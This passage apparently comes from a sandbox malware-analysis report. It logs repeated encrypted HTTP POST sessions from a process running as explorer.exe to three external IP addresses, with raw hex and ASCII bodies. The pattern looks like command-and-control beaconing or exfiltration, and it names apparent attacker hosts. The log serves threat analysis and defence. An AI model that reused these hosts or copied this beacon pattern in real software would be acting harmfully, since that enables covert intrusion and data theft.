                                                                                    2024-07-24 17:58:07 UTC685INData Raw: 6a 52 37 44 79 5a 38 6d 6a 46 68 77 51 4c 66 68 58 5a 6f 4b 55 66 6a 39 50 32 49 7a 6e 7a 34 46 6b 61 71 59 4e 69 38 59 57 37 4c 69 73 43 4e 73 54 58 75 70 31 42 72 53 32 42 4b 37 74 55 49 56 34 70 50 6d 4a 65 65 62 74 33 30 36 52 68 6c 2b 72 49 48 6a 73 2f 2f 34 62 68 63 46 59 49 30 37 6a 6e 6a 74 47 56 34 31 54 64 31 36 74 45 55 32 73 57 69 4a 69 63 54 33 77 65 47 4e 59 78 49 4f 2f 43 42 34 66 50 71 4a 61 77 6a 79 7a 70 33 30 2f 47 46 53 71 5a 56 6c 66 37 66 31 37 66 4e 44 64 66 4f 42 56 53 30 2f 6f 55 4d 58 37 49 4e 4a 36 38 38 6f 35 63 70 77 42 2b 38 48 36 6d 78 75 2f 75 64 49 41 4e 77 71 4f 71 56 6e 63 62 51 4e 43 42 6b 73 33 4a 50 39 38 6a 4c 4e 52 4f 2f 30 45 32 2f 59 53 66 47 4a 48 78 4c 31 7a 79 54 58 6d 48 52 79 41 41 68 39 79 77 55 6d 37 6d 69
                                                                                    Data Ascii: jR7DyZ8mjFhwQLfhXZoKUfj9P2Iznz4FkaqYNi8YW7LisCNsTXup1BrS2BK7tUIV4pPmJeebt306Rhl+rIHjs//4bhcFYI07jnjtGV41Td16tEU2sWiJicT3weGNYxIO/CB4fPqJawjyzp30/GFSqZVlf7f17fNDdfOBVS0/oUMX7INJ688o5cpwB+8H6mxu/udIANwqOqVncbQNCBks3JP98jLNRO/0E2/YSfGJHxL1zyTXmHRyAAh9ywUm7mi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    68192.168.2.1049820107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:08 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:08 UTC1122OUTData Raw: 54 35 50 2f 77 44 53 31 4a 63 45 64 67 77 76 4e 57 4c 36 4c 71 31 65 74 36 7a 31 71 6a 63 64 73 59 30 59 57 4d 35 45 46 73 62 69 72 2b 67 33 43 72 68 78 73 71 4f 63 64 73 57 52 45 63 5a 76 68 72 57 4b 64 68 74 64 6c 53 75 53 42 31 2b 36 62 42 6b 30 64 38 53 62 34 30 72 56 58 4a 6e 57 50 30 53 6a 6e 35 2b 73 50 77 33 7a 74 57 58 50 59 47 44 57 6c 44 77 4d 36 44 35 48 34 65 31 56 72 6c 33 55 61 32 72 4b 32 58 4a 6b 4c 70 4b 6a 72 49 39 56 70 7a 6a 67 36 6c 39 30 61 42 76 36 48 41 71 48 58 77 53 76 32 39 2f 62 47 4f 39 33 38 62 76 49 48 7a 6e 57 42 5a 6a 43 56 36 79 33 67 76 73 50 4b 7a 70 58 6d 78 6c 48 38 76 38 42 77 7a 6b 5a 6b 72 74 61 6e 6e 6a 51 51 70 51 30 72 64 69 74 57 49 70 52 34 6d 75 35 4e 4c 44 68 39 5a 69 66 49 45 76 4f 4c 4a 75 6f 33 53 76 4b
                                                                                    Data Ascii: T5P/wDS1JcEdgwvNWL6Lq1et6z1qjcdsY0YWM5EFsbir+g3CrhxsqOcdsWREcZvhrWKdhtdlSuSB1+6bBk0d8Sb40rVXJnWP0Sjn5+sPw3ztWXPYGDWlDwM6D5H4e1Vrl3Ua2rK2XJkLpKjrI9Vpzjg6l90aBv6HAqHXwSv29/bGO938bvIHznWBZjCV6y3gvsPKzpXmxlH8v8BwzkZkrtannjQQpQ0rditWIpR4mu5NLDh9ZifIEvOLJuo3SvK
                                                                                    2024-07-24 17:58:10 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:10 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:10 UTC685INData Raw: 62 48 32 30 31 45 37 37 37 49 6b 44 42 58 6f 4d 2b 77 53 4f 73 4e 34 6e 38 39 75 32 57 2f 6d 2f 70 32 73 69 57 49 68 55 32 79 57 35 33 32 57 6f 45 4e 44 55 32 34 78 75 73 4d 66 2b 2f 55 6d 53 54 41 30 78 63 37 54 2b 79 39 56 62 2b 41 49 39 79 4c 45 39 76 65 73 56 32 6d 53 4b 64 32 4b 6d 72 76 6f 72 6f 62 38 4d 6e 35 63 4a 56 42 79 77 34 34 49 58 66 5a 48 33 47 30 2b 31 63 72 37 6c 64 46 31 7a 35 6a 4e 57 70 70 77 32 6b 56 68 37 4c 48 35 33 56 43 6f 55 47 66 78 5a 52 57 7a 4a 52 67 4a 66 6c 71 4f 56 38 57 6c 6a 39 33 44 55 70 47 6d 31 69 4c 4b 4f 76 32 76 39 58 38 72 57 6b 50 65 6c 59 56 4a 67 72 75 48 72 4e 76 4f 71 2b 35 68 66 65 4f 34 76 53 70 2b 50 67 54 43 4c 35 4d 56 71 32 69 36 4f 4f 50 62 31 77 74 68 6a 52 44 62 73 55 44 4a 36 74 4a 4f 51 4f 37 54
                                                                                    Data Ascii: bH201E777IkDBXoM+wSOsN4n89u2W/m/p2siWIhU2yW532WoENDU24xusMf+/UmSTA0xc7T+y9Vb+AI9yLE9vesV2mSKd2Kmrvorob8Mn5cJVByw44IXfZH3G0+1cr7ldF1z5jNWppw2kVh7LH53VCoUGfxZRWzJRgJflqOV8Wlj93DUpGm1iLKOv2v9X8rWkPelYVJgruHrNvOq+5hfeO4vSp+PgTCL5MVq2i6OOPb1wthjRDbsUDJ6tJOQO7T


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    69192.168.2.1049822107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:10 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:58:10 UTC1267OUTData Raw: 68 38 75 4c 56 70 48 4b 79 2b 78 31 44 43 72 6b 5a 74 64 35 74 2b 55 35 66 63 76 77 50 75 65 66 6e 6b 35 4a 6a 49 32 52 32 69 53 32 55 4d 4d 5a 79 34 67 51 5a 63 7a 77 50 6a 6a 46 61 4b 52 6b 48 46 51 45 4e 78 78 61 77 6e 57 63 50 32 2f 37 51 4d 79 52 36 46 54 43 65 34 64 78 4f 6f 59 46 6f 6d 59 6b 41 5a 68 5a 36 48 61 69 6a 38 39 74 6f 47 71 31 7a 30 38 6a 31 42 53 70 48 6c 37 39 59 72 49 4f 57 78 38 4f 65 47 68 5a 7a 58 66 30 6c 72 54 4f 32 78 53 72 37 4f 46 76 64 49 56 51 73 4b 77 33 43 53 74 48 2f 66 78 74 6b 36 4e 62 4f 50 51 49 58 35 4d 31 70 35 77 7a 54 72 66 4e 49 70 68 6f 39 7a 50 42 63 68 43 48 36 4b 31 4f 47 79 71 69 2b 51 32 53 31 35 4f 6b 7a 50 55 30 62 67 46 4b 4e 51 6e 6e 30 42 41 62 54 66 66 66 66 36 38 4e 6a 6f 43 4e 63 32 41 77 4e 34 2f
                                                                                    Data Ascii: h8uLVpHKy+x1DCrkZtd5t+U5fcvwPuefnk5JjI2R2iS2UMMZy4gQZczwPjjFaKRkHFQENxxawnWcP2/7QMyR6FTCe4dxOoYFomYkAZhZ6Haij89toGq1z08j1BSpHl79YrIOWx8OeGhZzXf0lrTO2xSr7OFvdIVQsKw3CStH/fxtk6NbOPQIX5M1p5wzTrfNIpho9zPBchCH6K1OGyqi+Q2S15OkzPU0bgFKNQnn0BAbTffff68NjoCNc2AwN4/
                                                                                    2024-07-24 17:58:12 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:12 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:12 UTC685INData Raw: 50 59 4c 44 65 59 4d 47 76 71 48 68 4d 54 55 33 79 66 53 73 59 57 66 71 6e 69 6d 41 69 51 4f 72 47 34 75 63 46 64 70 48 62 76 4a 7a 6a 6e 63 55 2b 65 36 6a 53 62 45 76 6a 32 58 2b 78 71 79 6d 47 6e 31 4b 69 57 65 37 4a 70 36 49 6b 44 42 57 30 72 5a 35 33 65 72 36 69 6c 41 56 77 44 38 45 53 61 38 58 37 68 4f 78 66 36 6f 4d 64 41 4a 58 4a 6e 59 59 7a 2f 58 30 45 6c 48 75 36 34 6d 46 30 57 54 30 77 31 77 30 79 36 6a 70 43 64 6f 67 51 4c 4c 34 59 63 70 65 4c 58 76 50 73 73 55 6d 41 51 59 73 79 61 6e 49 75 39 7a 42 50 72 4a 2b 59 66 33 55 66 77 79 64 54 56 66 6f 44 42 38 59 2f 4d 30 47 54 74 30 56 52 62 61 42 63 54 62 30 71 37 48 2b 54 5a 77 51 59 42 4e 4e 68 77 42 42 64 71 6b 61 41 42 5a 2f 66 4d 6c 65 74 58 79 59 78 7a 73 42 44 2f 78 49 31 43 30 47 38 4f 76
                                                                                    Data Ascii: PYLDeYMGvqHhMTU3yfSsYWfqnimAiQOrG4ucFdpHbvJzjncU+e6jSbEvj2X+xqymGn1KiWe7Jp6IkDBW0rZ53er6ilAVwD8ESa8X7hOxf6oMdAJXJnYYz/X0ElHu64mF0WT0w1w0y6jpCdogQLL4YcpeLXvPssUmAQYsyanIu9zBPrJ+Yf3UfwydTVfoDB8Y/M0GTt0VRbaBcTb0q7H+TZwQYBNNhwBBdqkaABZ/fMletXyYxzsBD/xI1C0G8Ov


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    70192.168.2.1049824167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:13 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:13 UTC1122OUTData Raw: 71 57 32 44 6a 4c 43 6e 6d 35 43 66 52 78 56 35 74 34 61 34 4a 65 2b 66 79 58 34 4e 5a 6f 4f 4b 7a 6b 56 4a 4e 45 4b 73 37 39 4f 2f 53 52 70 58 68 2b 74 73 32 78 32 6a 43 6a 38 41 56 46 59 47 67 51 47 75 66 4c 73 2f 4f 4c 2f 55 54 53 44 74 55 30 53 36 39 4a 67 4d 2b 33 35 69 75 45 37 39 39 70 43 52 69 71 74 4c 48 33 66 72 73 46 35 69 4e 33 74 41 64 57 62 63 49 77 32 75 6f 66 34 52 6a 51 78 63 47 39 2f 79 44 62 6e 7a 50 5a 30 46 4a 50 75 4b 46 2f 2f 62 69 68 33 6d 36 7a 32 59 37 69 44 57 30 4b 68 64 72 77 32 72 34 6b 52 55 41 2f 4e 41 6c 5a 2f 44 55 78 67 39 67 6f 41 47 57 45 78 77 73 57 71 6c 36 7a 58 36 6f 2b 32 42 41 37 68 6a 4b 51 78 65 59 5a 37 50 64 5a 75 79 4c 59 63 4a 38 77 58 79 37 35 45 74 70 56 77 49 36 6f 47 73 62 46 44 47 44 4c 33 33 76 59 61
                                                                                    Data Ascii: qW2DjLCnm5CfRxV5t4a4Je+fyX4NZoOKzkVJNEKs79O/SRpXh+ts2x2jCj8AVFYGgQGufLs/OL/UTSDtU0S69JgM+35iuE799pCRiqtLH3frsF5iN3tAdWbcIw2uof4RjQxcG9/yDbnzPZ0FJPuKF//bih3m6z2Y7iDW0Khdrw2r4kRUA/NAlZ/DUxg9goAGWExwsWql6zX6o+2BA7hjKQxeYZ7PdZuyLYcJ8wXy75EtpVwI6oGsbFDGDL33vYa
                                                                                    2024-07-24 17:58:14 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:13 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:14 UTC685INData Raw: 53 75 77 78 75 6d 59 54 56 2b 71 54 75 6f 43 47 53 46 6b 42 6d 65 67 6d 62 54 55 70 64 50 75 6d 4c 66 6d 2b 74 2f 47 61 4d 56 41 56 72 68 44 49 53 44 49 59 48 2f 59 52 71 44 42 53 6e 31 54 2f 59 32 46 47 35 4e 35 34 56 4a 57 35 75 36 78 61 4e 53 37 79 4e 4a 70 2f 6f 4a 42 6c 4c 54 52 6e 72 6b 6f 50 5a 53 77 4f 57 4d 42 66 31 4e 50 39 49 6d 61 6d 65 73 4b 70 33 70 6b 6b 74 30 55 2b 66 72 67 7a 61 30 5a 39 77 46 58 2f 33 49 76 30 69 36 78 6e 70 6b 56 4b 78 2f 36 5a 76 32 51 30 37 4a 45 77 33 63 51 58 74 44 46 63 2f 6a 57 47 49 62 35 71 47 51 70 6a 4f 67 30 61 56 2b 6e 76 4e 69 46 54 35 77 67 68 38 57 46 78 59 59 43 56 77 72 51 7a 76 39 39 50 58 75 33 58 74 75 71 41 6a 69 4b 43 69 4a 75 52 55 4a 44 2f 55 48 46 79 34 75 74 4b 79 37 78 54 52 66 4c 33 54 6e 37
                                                                                    Data Ascii: SuwxumYTV+qTuoCGSFkBmegmbTUpdPumLfm+t/GaMVAVrhDISDIYH/YRqDBSn1T/Y2FG5N54VJW5u6xaNS7yNJp/oJBlLTRnrkoPZSwOWMBf1NP9ImamesKp3pkkt0U+frgza0Z9wFX/3Iv0i6xnpkVKx/6Zv2Q07JEw3cQXtDFc/jWGIb5qGQpjOg0aV+nvNiFT5wgh8WFxYYCVwrQzv99PXu3XtuqAjiKCiJuRUJD/UHFy4utKy7xTRfL3Tn7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    71192.168.2.1049826107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:14 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:14 UTC1122OUTData Raw: 70 50 32 56 38 5a 45 68 37 78 4b 41 41 7a 4e 41 76 2b 62 65 6b 66 6f 65 63 77 6f 75 75 33 63 68 75 7a 4a 57 73 51 4f 58 70 6a 6c 38 30 4a 61 41 47 6b 79 53 41 69 38 49 6b 62 6e 33 45 41 7a 66 4e 71 53 48 4f 4a 73 2b 69 76 6f 5a 6b 71 2b 57 34 50 6f 77 43 76 65 7a 62 46 54 67 38 73 6e 2f 32 6a 57 69 65 4f 63 51 73 73 74 36 6b 46 31 69 6e 38 71 4e 59 4a 6f 4a 4d 4f 45 36 47 51 42 63 78 51 7a 6b 39 43 68 48 73 30 64 33 37 49 6b 62 5a 69 44 4d 4f 35 47 4c 54 2b 6f 72 6a 48 51 34 6e 65 2b 65 6c 52 62 4f 6b 61 4d 4a 46 74 66 65 4f 45 55 75 54 6c 31 49 42 50 4f 4d 42 73 50 69 6e 55 62 45 72 44 53 5a 6a 37 41 38 4e 52 36 36 69 44 45 37 39 78 57 59 52 39 4b 71 36 33 36 78 65 4f 4e 30 61 58 7a 46 57 2b 6a 72 4a 6a 2b 35 6e 6c 35 67 51 5a 43 64 6a 42 47 51 76 71 4f
                                                                                    Data Ascii: pP2V8ZEh7xKAAzNAv+bekfoecwouu3chuzJWsQOXpjl80JaAGkySAi8Ikbn3EAzfNqSHOJs+ivoZkq+W4PowCvezbFTg8sn/2jWieOcQsst6kF1in8qNYJoJMOE6GQBcxQzk9ChHs0d37IkbZiDMO5GLT+orjHQ4ne+elRbOkaMJFtfeOEUuTl1IBPOMBsPinUbErDSZj7A8NR66iDE79xWYR9Kq636xeON0aXzFW+jrJj+5nl5gQZCdjBGQvqO
                                                                                    2024-07-24 17:58:16 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:16 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:16 UTC685INData Raw: 53 67 49 75 75 46 62 58 66 52 6a 66 67 38 35 49 2f 34 4b 37 70 69 59 6e 52 7a 45 68 31 44 31 54 61 6e 6e 57 7a 66 6b 69 7a 66 54 55 6e 69 49 6e 63 6f 6a 77 45 72 33 49 69 4c 67 2f 53 6f 4e 41 46 64 39 33 76 4b 30 41 5a 49 51 75 69 73 47 45 6c 63 38 6c 56 69 37 2b 48 55 72 75 6a 4e 63 64 38 4a 42 5a 44 51 64 61 66 37 2f 36 64 30 6a 67 4c 6e 66 54 6f 48 45 4c 77 34 48 79 4e 54 79 4a 4f 55 46 6b 65 34 53 6a 62 56 73 66 4f 76 79 7a 46 6f 68 59 6b 42 43 2f 43 4f 4c 4b 43 48 59 4f 43 4a 5a 7a 53 62 54 6d 72 4f 37 69 5a 37 5a 63 6b 78 74 57 4d 78 76 72 32 67 4d 79 56 39 35 49 73 55 6a 4a 71 65 64 50 4a 51 6b 5a 75 31 58 70 70 37 46 6d 64 6c 55 57 5a 41 41 50 39 50 61 36 55 39 6c 5a 69 59 73 34 41 52 63 70 2f 37 63 33 76 61 6d 72 43 34 7a 73 37 5a 5a 44 47 44 35
                                                                                    Data Ascii: SgIuuFbXfRjfg85I/4K7piYnRzEh1D1TannWzfkizfTUniIncojwEr3IiLg/SoNAFd93vK0AZIQuisGElc8lVi7+HUrujNcd8JBZDQdaf7/6d0jgLnfToHELw4HyNTyJOUFke4SjbVsfOvyzFohYkBC/COLKCHYOCJZzSbTmrO7iZ7ZckxtWMxvr2gMyV95IsUjJqedPJQkZu1Xpp7FmdlUWZAAP9Pa6U9lZiYs4ARcp/7c3vamrC4zs7ZZDGD5


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    72192.168.2.1049827107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:16 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:16 UTC1122OUTData Raw: 4d 31 39 53 34 36 39 2f 2b 79 62 38 4e 65 39 52 52 42 71 4d 56 7a 55 66 6f 74 48 58 53 70 58 78 43 41 39 69 4d 68 4f 6c 43 34 6d 4a 54 47 47 5a 73 50 38 59 52 51 54 67 2b 4f 53 45 37 4e 64 43 36 4d 76 2f 45 4c 58 68 44 61 37 32 46 6d 49 4a 63 6f 4c 59 4b 35 4d 6a 45 62 75 57 6a 79 6a 42 38 39 69 36 72 37 51 6c 67 70 4d 35 6c 47 56 78 78 64 4c 67 43 37 31 36 77 4f 64 4c 76 70 56 57 50 46 6a 4f 79 42 6f 33 33 71 39 43 51 6a 44 50 7a 72 5a 78 77 61 41 31 42 5a 47 32 4d 57 34 52 6d 55 47 4f 6f 35 74 65 33 78 59 4f 53 32 69 75 4e 30 4d 73 64 58 4d 4b 43 52 39 4e 35 68 6e 59 36 68 68 32 6d 32 38 4e 54 52 2b 77 34 4c 56 49 2b 5a 6b 51 56 37 50 71 4c 6a 71 47 31 6e 4a 6f 49 32 41 33 51 54 70 41 35 2b 32 66 4f 4c 32 78 58 73 61 45 62 56 46 63 76 5a 45 56 75 54 53
                                                                                    Data Ascii: M19S469/+yb8Ne9RRBqMVzUfotHXSpXxCA9iMhOlC4mJTGGZsP8YRQTg+OSE7NdC6Mv/ELXhDa72FmIJcoLYK5MjEbuWjyjB89i6r7QlgpM5lGVxxdLgC716wOdLvpVWPFjOyBo33q9CQjDPzrZxwaA1BZG2MW4RmUGOo5te3xYOS2iuN0MsdXMKCR9N5hnY6hh2m28NTR+w4LVI+ZkQV7PqLjqG1nJoI2A3QTpA5+2fOL2xXsaEbVFcvZEVuTS
                                                                                    2024-07-24 17:58:18 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:18 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:18 UTC685INData Raw: 47 42 6f 41 5a 69 4d 51 4d 6a 39 52 47 4c 70 59 4a 54 6a 57 33 33 37 72 57 70 53 36 55 46 64 72 41 4c 57 33 31 66 6c 6c 7a 32 77 62 52 74 6b 42 41 61 77 44 54 59 59 44 6b 64 36 79 6b 67 61 67 31 39 53 6c 36 70 44 6b 55 79 35 6b 2f 4d 46 32 64 4a 38 53 6f 7a 72 76 63 65 56 44 71 48 70 7a 4d 68 55 73 45 45 37 6d 4f 49 67 73 43 44 34 48 4b 65 50 69 62 63 50 79 78 37 33 48 50 4e 47 45 2f 39 65 42 4b 73 49 32 70 6d 51 72 78 35 6d 4f 48 77 45 35 6f 66 69 34 46 6b 56 74 6e 49 68 69 77 5a 2f 65 48 68 38 2b 37 75 76 2b 4b 4a 75 63 6c 37 6a 79 56 48 5a 6e 4b 36 79 67 6a 79 54 51 6f 50 55 53 75 2f 2b 55 69 30 54 6e 5a 6d 30 48 4b 35 44 33 6a 73 35 59 30 63 56 45 53 48 62 6a 6a 61 4c 65 75 6c 48 74 4c 31 45 44 31 74 6f 6b 6c 4f 50 6f 37 4c 73 71 6a 35 38 62 36 30 42
                                                                                    Data Ascii: GBoAZiMQMj9RGLpYJTjW337rWpS6UFdrALW31fllz2wbRtkBAawDTYYDkd6ykgag19Sl6pDkUy5k/MF2dJ8SozrvceVDqHpzMhUsEE7mOIgsCD4HKePibcPyx73HPNGE/9eBKsI2pmQrx5mOHwE5ofi4FkVtnIhiwZ/eHh8+7uv+KJucl7jyVHZnK6ygjyTQoPUSu/+Ui0TnZm0HK5D3js5Y0cVESHbjjaLeulHtL1ED1toklOPo7Lsqj58b60B


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    73192.168.2.1049828167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:19 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:19 UTC1122OUTData Raw: 55 41 7a 39 55 57 53 4e 49 43 57 78 55 48 42 4b 52 72 2b 54 66 49 51 5a 53 39 32 44 4e 2b 6a 31 2b 7a 56 72 34 6a 37 57 30 61 69 37 78 39 6e 32 6f 6a 34 64 61 32 4b 46 4f 57 65 37 39 6e 55 2f 59 4b 32 34 44 54 2f 31 72 51 36 69 31 35 77 47 51 56 55 69 4b 65 4a 32 6e 61 4f 41 31 53 4f 71 4f 34 4c 69 6e 77 6e 57 38 6c 4a 4e 66 51 42 72 6a 2b 4a 4f 58 33 48 4a 47 6f 4e 4d 4a 55 55 5a 67 4b 4b 43 44 7a 75 49 76 6f 68 68 2b 5a 33 47 31 36 67 77 6a 6d 44 6c 78 4e 46 61 37 43 38 68 4f 56 69 33 58 7a 78 38 73 2f 7a 4d 69 35 63 49 34 79 6f 65 50 34 7a 74 47 64 36 33 48 56 2f 77 61 63 71 48 35 30 43 48 72 78 31 4d 74 78 71 71 6c 71 54 6e 66 78 70 79 70 61 6f 62 77 32 64 50 2f 43 4a 64 33 48 65 51 62 64 70 2b 37 42 79 72 4e 35 54 2f 30 4a 65 6c 6a 5a 31 5a 79 39 30
                                                                                    Data Ascii: UAz9UWSNICWxUHBKRr+TfIQZS92DN+j1+zVr4j7W0ai7x9n2oj4da2KFOWe79nU/YK24DT/1rQ6i15wGQVUiKeJ2naOA1SOqO4LinwnW8lJNfQBrj+JOX3HJGoNMJUUZgKKCDzuIvohh+Z3G16gwjmDlxNFa7C8hOVi3Xzx8s/zMi5cI4yoeP4ztGd63HV/wacqH50CHrx1MtxqqlqTnfxpypaobw2dP/CJd3HeQbdp+7ByrN5T/0JeljZ1Zy90
                                                                                    2024-07-24 17:58:20 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:19 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:20 UTC685INData Raw: 47 44 52 6d 69 72 61 35 55 46 65 63 45 50 69 53 66 73 72 4f 4e 59 4f 51 36 34 2b 44 76 39 65 34 4e 69 52 55 42 65 78 31 43 6f 6e 71 72 56 4a 72 2b 47 74 4a 53 73 6e 2f 59 6a 79 30 37 6e 44 6d 71 7a 6d 78 58 4b 2b 5a 2f 38 47 39 52 6a 4c 4f 4e 36 42 6f 30 47 52 30 41 2b 74 6e 4d 78 71 66 77 67 48 30 55 56 48 6a 7a 53 7a 39 41 57 6d 4f 7a 6b 64 34 52 4b 4f 79 51 57 70 78 2b 4e 76 70 37 49 44 55 37 32 49 67 72 70 47 4c 35 6a 73 2f 70 52 44 64 66 64 66 5a 31 42 4e 68 36 49 61 72 4d 55 7a 55 41 67 6e 6a 4c 39 5a 4c 68 5a 5a 41 6a 33 6b 42 49 52 4a 79 78 6b 68 4d 2f 69 61 56 2b 74 55 77 44 6e 52 79 68 6a 68 64 7a 73 44 45 6e 4f 48 44 5a 4b 6e 39 30 47 4d 71 75 79 6d 61 50 66 33 51 6b 47 79 4a 44 36 41 2b 52 59 41 65 54 4f 34 6b 6c 79 66 5a 79 55 6f 59 39 35 50
                                                                                    Data Ascii: GDRmira5UFecEPiSfsrONYOQ64+Dv9e4NiRUBex1ConqrVJr+GtJSsn/Yjy07nDmqzmxXK+Z/8G9RjLON6Bo0GR0A+tnMxqfwgH0UVHjzSz9AWmOzkd4RKOyQWpx+Nvp7IDU72IgrpGL5js/pRDdfdfZ1BNh6IarMUzUAgnjL9ZLhZZAj3kBIRJyxkhM/iaV+tUwDnRyhjhdzsDEnOHDZKn90GMquymaPf3QkGyJD6A+RYAeTO4klyfZyUoY95P


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    74192.168.2.1049829107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:20 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:20 UTC1122OUTData Raw: 52 49 67 57 42 78 79 37 73 41 43 63 2b 63 6d 48 39 35 4d 39 66 62 4f 62 4b 64 49 70 6c 30 46 58 71 41 68 6b 75 30 68 31 36 6d 4e 50 2b 30 68 6a 76 30 65 48 73 68 46 47 76 48 37 51 50 6c 34 2b 45 36 5a 4b 76 2b 44 74 5a 33 44 44 6f 77 37 73 64 79 6b 51 6c 6e 72 63 6e 44 49 4f 72 37 32 77 76 6a 45 6d 77 6d 6f 61 49 55 53 43 4f 32 53 56 75 78 44 62 38 39 2f 71 30 6b 52 69 55 51 58 7a 39 42 77 37 2b 6f 78 79 68 34 51 74 43 61 7a 52 49 4a 41 61 74 42 77 71 44 68 30 76 33 38 51 79 72 75 7a 38 6b 68 32 54 38 4e 61 6e 72 4e 6e 68 6f 79 63 59 5a 6e 47 75 69 6a 76 34 52 6c 34 54 72 46 4c 56 57 56 59 4d 65 2f 61 58 57 31 4c 73 69 58 65 39 65 6e 34 6c 51 67 6b 57 76 70 42 76 30 62 59 7a 46 48 76 4b 39 45 66 36 32 51 51 2b 49 76 67 76 4b 7a 74 49 50 35 38 68 5a 79 39
                                                                                    Data Ascii: RIgWBxy7sACc+cmH95M9fbObKdIpl0FXqAhku0h16mNP+0hjv0eHshFGvH7QPl4+E6ZKv+DtZ3DDow7sdykQlnrcnDIOr72wvjEmwmoaIUSCO2SVuxDb89/q0kRiUQXz9Bw7+oxyh4QtCazRIJAatBwqDh0v38Qyruz8kh2T8NanrNnhoycYZnGuijv4Rl4TrFLVWVYMe/aXW1LsiXe9en4lQgkWvpBv0bYzFHvK9Ef62QQ+IvgvKztIP58hZy9
                                                                                    2024-07-24 17:58:22 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:22 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
